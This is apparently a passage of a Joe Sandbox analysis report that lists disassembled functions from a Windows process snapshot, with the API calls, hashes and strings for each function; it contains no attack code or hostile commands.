Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File$DeleteErrorLastWrite_get_osfhandle
String ID:
API String ID: 2448200120-0
Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
Instruction ID: 8ffb5361991b972401bc92924fa03a3bfdf9d45d05b712535e6cce38ceab87c1
Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
Instruction Fuzzy Hash: 81214731A08B42CBE654AF51A902279B6A1FF88B81F48417DED4EA7795CF3CE451CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683FA196F

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA19B3
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA19D6
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA1A01

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$DriveNamePathTypeVolume
String ID:
API String ID: 1029679093-0
Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
Instruction ID: 7a629254a1d28cfade931782bd00424bb86be49b844e012d4f84d7df7f5d3083
Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
Instruction Fuzzy Hash: 86311C32705B81CAEB608F21D8953E967A4FB4DB88F494139DA4D97744DF3CD645C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F87D54
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F87D68

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
Instruction ID: ed75adba56526bfe3bb8c30e5cafc9ea12bfdae0d8f464d3c89616a17daeac37
Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
Instruction Fuzzy Hash: 05218861A48B41C6EE049B52E501079B7A1FF89BD5B5C9238DE1EA3755DF3CE406C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F76A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F83C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F83D0C
Part of subcall function 00007FF683F83C24: towupper.MSVCRT ref: 00007FF683F83D2F
Part of subcall function 00007FF683F83C24: iswalpha.MSVCRT ref: 00007FF683F83D4F
Part of subcall function 00007FF683F83C24: towupper.MSVCRT ref: 00007FF683F83D75
Part of subcall function 00007FF683F83C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F83DBF

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F76ABF
RtlFreeHeap.NTDLL(?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F76AD3

Part of subcall function 00007FF683F76B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF683F76AE8,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B8B
Part of subcall function 00007FF683F76B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF683F76AE8,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B97
Part of subcall function 00007FF683F76B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF683F76AE8,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76BAF

Part of subcall function 00007FF683F76B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F76AF1,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B39
Part of subcall function 00007FF683F76B30: RtlFreeHeap.NTDLL(?,?,?,00007FF683F76AF1,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B4D
Part of subcall function 00007FF683F76B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F76AF1,?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925), ref: 00007FF683F76B59

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F76B03
RtlFreeHeap.NTDLL(?,?,?,00007FF683F9EA0F,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F76B17

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
String ID:
API String ID: 3512109576-0
Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
Instruction ID: 150e4b7bf54989fe0f7f39134c107e837492d425654f86a7c2e60bbdfd50257a
Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
Instruction Fuzzy Hash: A5216261A09A82C5EF04DF65D4163B87BA0FF5AB49F1C803AC90EA7351DF3C9445C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7AF82), ref: 00007FF683F7B6D0
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7AF82), ref: 00007FF683F7B6E7
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7AF82), ref: 00007FF683F7B701
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7AF82), ref: 00007FF683F7B715

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$Process$AllocSize
String ID:
API String ID: 2549470565-0
Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
Instruction ID: 5445afdb4f44d28f5f18342fb884f22469a7e50e0595beccbcad79a66a6e5413
Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
Instruction Fuzzy Hash: DB213376A0A7C2C6EE548B15E4420B8B6B1FF89B85B4CD439DA0EA3754DF3CE846C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF683F8507A), ref: 00007FF683F9D01C
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF683F8507A), ref: 00007FF683F9D033
FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF683F8507A), ref: 00007FF683F9D06D
SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF683F8507A), ref: 00007FF683F9D07F

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
String ID:
API String ID: 1033415088-0
Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
Instruction ID: 45c17d909b8cf232a08a686072390ba42fb1332194d2b6e175c3e4aea8392864
Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
Instruction Fuzzy Hash: 47119031618A42C7DA048B24F01517AB7E0FF8AB95F495139FA8E97BA8DF3CC045CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F759E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F75A2E
_open_osfhandle.MSVCRT ref: 00007FF683F75A4F
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF683F7260D), ref: 00007FF683F937AA
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F937D2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
String ID:
API String ID: 22757656-0
Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
Instruction ID: 52949baa21e72813bc9b5d691b0c8b3a611165a0dec6eded43364b23e4a47cee
Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
Instruction Fuzzy Hash: 12113071A18645CBEB504B24E4493797AA1FF89B64F684738DA2E973D0CF3CD549CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F89158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF683F89163
RtlLookupFunctionEntry.NTDLL ref: 00007FF683F89182
RtlVirtualUnwind.NTDLL ref: 00007FF683F891CF
__raise_securityfailure.LIBCMT ref: 00007FF683F89245

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
Instruction ID: f94f72dfe079cb4d33676ddefbb22d0fbc8aea269706a9e64b82001d9f234cae
Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
Instruction Fuzzy Hash: 3721B535919B45C6E7408B05F8923A973B4FF89758F58003AEA8DA37A4DFBDE444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F95690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF683F95433,?,?,?,00007FF683F969B8,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F956C5
RtlFreeHeap.NTDLL(?,?,00000028,00007FF683F95433,?,?,?,00007FF683F969B8,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F956D9
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF683F95433,?,?,?,00007FF683F969B8,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F956FD
RtlFreeHeap.NTDLL(?,?,00000028,00007FF683F95433,?,?,?,00007FF683F969B8,?,?,?,?,?,00007FF683F88C39), ref: 00007FF683F95711

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
Instruction ID: b82fda4a6fccfc8e2302b43a91854d898fb0218d7aba34019dbcf656d644972e
Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
Instruction Fuzzy Hash: 47110A72A08B91C6DB008F56E4440ADBBB0FB4DF85B5D8129DB4E53718DF38E456CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F78798), ref: 00007FF683F84AD6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F78798), ref: 00007FF683F84AEF

Part of subcall function 00007FF683F84A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A28
Part of subcall function 00007FF683F84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A66
Part of subcall function 00007FF683F84A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A7D
Part of subcall function 00007FF683F84A14: memmove.MSVCRT(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A9A
Part of subcall function 00007FF683F84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84AA2

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F78798), ref: 00007FF683F8EE64
RtlFreeHeap.NTDLL(?,?,?,00007FF683F78798), ref: 00007FF683F8EE78

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememmove
String ID:
API String ID: 3874763886-0
Opcode ID: a4ed9730d3c6c81ba5f221eab6fcc823e7ba38e65aafe0768b810c3c56661ab8
Instruction ID: ac38f083c775f83415f8311145c2b73642177b3c73f3337689e98e9599f7a1f1
Opcode Fuzzy Hash: a4ed9730d3c6c81ba5f221eab6fcc823e7ba38e65aafe0768b810c3c56661ab8
Instruction Fuzzy Hash: 7EF01D61A59B82C6EF189B669406178A9D1FF8EB46B4DD438CD0EE7350EE3CA444CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F9F235
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F9F249
_get_osfhandle.MSVCRT ref: 00007FF683F9F263
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F9F276

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
Instruction ID: cb21037bc3e0df6f29ad6bc4715e3975f9f7ebefd464fe108dfca1ee1ea4b9eb
Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
Instruction Fuzzy Hash: 3DF03731624A42CBD7045B10E845179FAA0FF8AB06F489239DA0F53394DF3CD404CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806D6
Part of subcall function 00007FF683F806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806F0
Part of subcall function 00007FF683F806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F8074D
Part of subcall function 00007FF683F806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F80762

Part of subcall function 00007FF683F7EF40: iswspace.MSVCRT ref: 00007FF683F7F000
Part of subcall function 00007FF683F7EF40: wcschr.MSVCRT ref: 00007FF683F7F031
Part of subcall function 00007FF683F7EF40: iswdigit.MSVCRT ref: 00007FF683F7F0D6

longjmp.MSVCRT ref: 00007FF683F8CCBC
longjmp.MSVCRT(?,?,00000000,00007FF683F81F69,?,?,?,?,?,?,?,00007FF683F7286E,00000000,00000000,00000000,00000000), ref: 00007FF683F8CCE0

Strings

GeToken: (%x) '%s', xrefs: 00007FF683F8CC39, 00007FF683F8CCF2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
String ID: GeToken: (%x) '%s'
API String ID: 3282654869-1994581435
Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
Instruction ID: adbd09a81ea7c4866f9b4670f941c00741da66d360f388e53258405aeab56ca7
Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
Instruction Fuzzy Hash: 5B61F261B49286C2FA188B22945617962A1FF55BA4F1C453ECA1EEB7E0EE3CE440C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

wcschr.MSVCRT ref: 00007FF683FA11DC
memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF683F9827A), ref: 00007FF683FA1277

Strings

&()[]{}^=;!%'+,`~, xrefs: 00007FF683FA11D5

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$AllocateProcessmemmovewcschr
String ID: &()[]{}^=;!%'+,`~
API String ID: 4220614737-381716982
Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
Instruction ID: 2976e11154731d6671ac9f5c5688d7c4612234bd7d27f434924f23efa4c5837b
Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
Instruction Fuzzy Hash: C771D571A08252C5E7608F15A44267976E8FF94798F59063DDA4DF7B90CF3CE441CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00007FF683FA09BC
wcsncmp.MSVCRT ref: 00007FF683FA09F5

Strings

0123456789, xrefs: 00007FF683FA08FE

